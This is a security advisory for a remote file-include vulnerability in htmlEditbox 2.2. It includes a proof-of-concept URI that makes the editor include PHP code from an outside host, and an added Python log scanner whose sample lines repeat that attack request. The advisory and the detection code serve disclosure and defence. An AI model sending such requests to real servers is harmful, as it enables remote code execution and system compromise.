HTMLEditBox Config.PHP Remote File Include Vulnerability
BID:23664
Info
| Bugtraq ID: | 23664 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 25 2007 12:00AM |
| Updated: | Apr 25 2007 12:00AM |
| Credit: | [email protected] is credited with the discovery of this vulnerability. |
| Vulnerable: | Labs4 htmlEditor 2.2 |
| Not Vulnerable: | |
Discussion
htmlEditbox is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit this vulnerability to execute malicious PHP code in the context of the webserver. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
htmlEditbox 2.2 is vulnerable to this issue; other versions may also be affected.
Exploit / POC
Attackers can use a browser to exploit this issue.
A proof-of-concept URI is available:
http://www.example.com/_editor.php?settings[app_dir]=http://shell
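As an added example (not part of this advisory or of the htmlEditbox project), the following Python check scans web-server access logs for requests matching the proof-of-concept pattern above: a `_editor.php` request whose `settings[app_dir]` parameter carries a URL or PHP stream-wrapper value rather than a local directory name. The log lines are constructed for the example and the client addresses are documentation ranges.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (Apache combined format); hosts,
# timestamps and user agents are made up for this example.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Apr/2007:10:01:22 +0000] "GET /_editor.php?settings[app_dir]=http://shell HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [25/Apr/2007:10:02:03 +0000] "GET /_editor.php?settings%5Bapp_dir%5D=https%3A%2F%2Fexample.net%2Fx HTTP/1.1" 200 512 "-" "curl/7.15"
192.0.2.7 - - [25/Apr/2007:10:03:44 +0000] "GET /_editor.php?settings[app_dir]=editor HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.8 - - [25/Apr/2007:10:04:10 +0000] "GET /index.php?page=home HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method and request target of a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)
# A value that starts with a URL scheme (http://, ftp://, ...) or a PHP
# stream wrapper (php:, data:, phar:) is never a legitimate local app_dir.
REMOTE_RE = re.compile(r'^(?:[a-z][a-z0-9+.-]*://|(?:data|php|phar):)', re.IGNORECASE)


def is_rfi_attempt(target: str) -> bool:
    """True when a request to _editor.php sets settings[app_dir] to a remote value."""
    parts = urlsplit(target)
    if not parts.path.endswith('/_editor.php'):
        return False
    # parse_qs percent-decodes keys and values, so the %5B/%5D form is covered.
    params = parse_qs(parts.query, keep_blank_values=True)
    for key, values in params.items():
        if unquote(key) != 'settings[app_dir]':
            continue
        if any(REMOTE_RE.match(unquote(v)) for v in values):
            return True
    return False


def find_rfi_attempts(log_text: str) -> list[tuple[str, str]]:
    """Return (client_ip, request_target) for every log line flagged as an RFI attempt."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m and is_rfi_attempt(m.group('target')):
            hits.append((m.group('ip'), m.group('target')))
    return hits


if __name__ == '__main__':
    for ip, target in find_rfi_attempts(SAMPLE_LOG):
        print(f"RFI attempt from {ip}: {target}")
```

The third sample line, which passes a plain directory name, and the fourth, which never touches `_editor.php`, are left unflagged; only values that would make PHP fetch a remote resource are reported.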
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
References